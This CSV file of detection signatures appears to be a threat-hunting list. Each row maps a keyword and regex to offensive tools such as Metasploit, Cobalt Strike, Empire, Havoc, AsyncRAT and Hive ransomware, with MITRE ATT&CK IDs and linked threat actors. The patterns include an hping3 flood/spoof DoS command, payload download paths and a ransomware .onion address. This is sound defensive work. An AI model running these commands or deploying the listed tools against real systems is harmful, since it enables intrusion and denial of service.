"*Host: FUZZ.machine.org*",".{0,1000}Host\:\sFUZZ\.machine\.org.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47284"
"*HostEnum.ps1*",".{0,1000}HostEnum\.ps1.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","N/A","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","47285"
"*HostExploiter.py*",".{0,1000}HostExploiter\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47286"
"*HostingCLR_inject*",".{0,1000}HostingCLR_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47287"
"*HostingCLRx64.dll*",".{0,1000}HostingCLRx64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47288"
"*hotnops.gitbook.io/gtunnel*",".{0,1000}hotnops\.gitbook\.io\/gtunnel.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","47290"
"*hotnops/gTunnel*",".{0,1000}hotnops\/gTunnel.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","47291"
"*houqingv1.0.zip*",".{0,1000}houqingv1\.0\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","47292"
"*HOW_TO_DECRYPT.txt*",".{0,1000}HOW_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","Hive","Hive ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","47293"
"*HOW_TO_DECYPHER_FILES.txt*",".{0,1000}HOW_TO_DECYPHER_FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","47294"
"*However, when tun2socks is in the*",".{0,1000}However,\swhen\stun2socks\sis\sin\sthe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","47295"
"*How-to-bypass-UAC-in-newer-Windows-versions.html*",".{0,1000}How\-to\-bypass\-UAC\-in\-newer\-Windows\-versions\.html.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47296"
"*Hp6kvaq9BCyI*",".{0,1000}Hp6kvaq9BCyI.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","user agent NIKMOK observed in AsyncRAT sample","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","Asyncrat - Redline","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","Malware","https://x.com/g0njxa/status/1829177645348860120","1","0","#mutex","https://www.virustotal.com/gui/file/810791ccd63225a766dd580e0e83d502df14172812fb912997e6a844bc9d7f6c/","9","10","N/A","N/A","N/A","N/A","47297"
"*hpe_sim_76_amf_deserialization*",".{0,1000}hpe_sim_76_amf_deserialization.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47298"
"*hpglfhgfnhbgpjdenjgmdgoeiappafln*",".{0,1000}hpglfhgfnhbgpjdenjgmdgoeiappafln.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47299"
"*hping2.h*",".{0,1000}hping2\.h.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","47300"
"*hping3 -*",".{0,1000}hping3\s\-.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","47301"
"*hping3 * --flood --frag --spoof * --destport*",".{0,1000}hping3\s.{0,1000}\s\-\-flood\s\-\-frag\s\-\-spoof\s.{0,1000}\s\-\-destport.{0,1000}","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","Impact","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","#linux","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","47302"
"*hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion*",".{0,1000}hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47303"
"*href=""""/"""">tor2web</a>*",".{0,1000}href\=\""\/\""\>tor2web\<\/a\>.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","47304"
"*HRShell*client.py*",".{0,1000}HRShell.{0,1000}client\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","47305"
"*HRShell*server.py*",".{0,1000}HRShell.{0,1000}server\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","47306"
"*hta_evasion.hta*",".{0,1000}hta_evasion\.hta.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47307"
"*HtaPowershellGenerator.*",".{0,1000}HtaPowershellGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","47308"
"*hta-to-javascript-crypter*",".{0,1000}hta\-to\-javascript\-crypter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","47309"
"*HtaVBSGenerator.*",".{0,1000}HtaVBSGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","47310"
"*htdigest2john.py*",".{0,1000}htdigest2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","47311"
"*htdocs/database/jasmin_db.sql*",".{0,1000}htdocs\/database\/jasmin_db\.sql.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47312"
"*html/js/beacons.js*",".{0,1000}html\/js\/beacons\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","47313"
"*html/scripts/merlin.js*",".{0,1000}html\/scripts\/merlin\.js.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","47314"
"*Html-Injection-Payloads.*",".{0,1000}Html\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","47315"
"*Html-Injection-Read-File-Payloads.*",".{0,1000}Html\-Injection\-Read\-File\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","47316"
"*HTMLSmuggler-main*",".{0,1000}HTMLSmuggler\-main.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","47317"
"*HTran.cpp - HUC Packet Transmit Tool.*",".{0,1000}HTran\.cpp\s\-\sHUC\sPacket\sTransmit\sTool\..{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","47327"
"*htrgouvea/nipe*",".{0,1000}htrgouvea\/nipe.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","1","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","47328"
"*htrgouvea/nipe*",".{0,1000}htrgouvea\/nipe.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","47329"
"*htshells-master*",".{0,1000}htshells\-master.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47330"
"*http* | hakrawler -d *",".{0,1000}http.{0,1000}\s\|\shakrawler\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47331"
"*http*/127.0.0.1*:1337*",".{0,1000}http.{0,1000}\/127\.0\.0\.1.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47333"
"*http*/alertmsg.zip*",".{0,1000}http.{0,1000}\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47335"
"*http*/charlotte.dll*",".{0,1000}http.{0,1000}\/charlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","47336"
"*http*/demon.dll",".{0,1000}http.{0,1000}\/demon\.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47337"
"*http*/demon.exe",".{0,1000}http.{0,1000}\/demon\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47338"
"*http*/demos/butcher/index.html*",".{0,1000}http.{0,1000}\/demos\/butcher\/index\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47339"
"*http*/john/Test/raw/master/*",".{0,1000}http.{0,1000}\/john\/Test\/raw\/master\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","47340"
"*http*/localhost*:1337*",".{0,1000}http.{0,1000}\/localhost.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47341"
